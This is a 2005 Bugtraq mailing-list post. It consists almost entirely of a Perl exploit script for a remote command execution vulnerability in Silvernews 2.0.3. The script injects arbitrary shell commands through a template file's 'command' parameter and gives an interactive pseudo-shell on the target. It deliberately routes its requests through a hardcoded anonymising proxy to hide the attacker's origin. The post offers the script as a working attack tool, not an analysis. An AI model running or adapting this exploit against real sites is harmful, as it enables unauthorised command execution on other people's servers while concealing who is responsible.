[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050805171518.12928.qmail@securityfocus.com>
Date: 5 Aug 2005 17:15:18 -0000
From: tsl@...urityfocus.com, "[at]"@securityfocus.com,
hackermail.com@...urityfocus.com
To: bugtraq@...urityfocus.com
Subject: Silvernews 2.0.3 remote command execution exploit, proxy server
support!
Exploit for the remote command execution vulnerability in Silvernews 2.0.3:
discovered by:
http://www.securityfocus.com/archive/1/407163/30/0/threaded
sploit:
--------
#!/usr/bin/perl
################TSL###########################################################
#
#
# SilverNews Exploit inlcuded Proxy Server Function
# THROAT SECURITY LABS
#
# vuln: http://www.target.com/templates/tpl_global.php?command=[command]
#
#
################TSL###########################################################
$l="\015\012";
$t=0;
my $sock;
my $target;
my $location;
my $command;
my $proxy;
#define your proxyserver:
$proxy = "200.186.217.122"; #brazil high anoynmity proxy
use IO::Socket;
sub sploit()
{
$sock = IO::Socket::INET->new(PeerAddr => $proxy, PeerPort => 80,
Proto => "tcp") or die "No Connection to Your ProxyServer: $proxy at Port 80\n";
print $sock "GET $target/$location/templates/tpl_global.php?command=$command HTTP/1.1$l";
print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$l";
print $sock "Connection: close$l";
while (<$sock>) {
if (/^HTTP\/1\.[0-2] ([0-9]{3}) .+$/ and $1 ne "200"){
print "Error! Got HTTP return code $1. Exciting!\n";
exit 1;
}
print if $t==1;
$t=1 if /^$l$/;
}
}
if (@ARGV != 2)
{
print "\n*** by lizard for [T]hroat [S]ecurity [L]abs\n";
print "-------------------------------------------------------\n\n";
print "* usage:\t $0 [target] [path] \n";
print "* example:\t $0 www.target.com newssystem \n";
print "----\n\n\n pia s. i love you forever ;)\n\n";
} else {
$target = $ARGV[0];
$location = $ARGV[1];
print "sending exploit ... please wait\n";
sleep(1);
while(1){
print "[sploit\@$target:/$location\] ";
$_=<STDIN>;
chop;
next if /^$/;
s/ /%20/;
#if ($command=="exit") {exit} else {sploit()};
$command=$_;
sploit();
}
}
#EOF#
Powered by blists - more mailing lists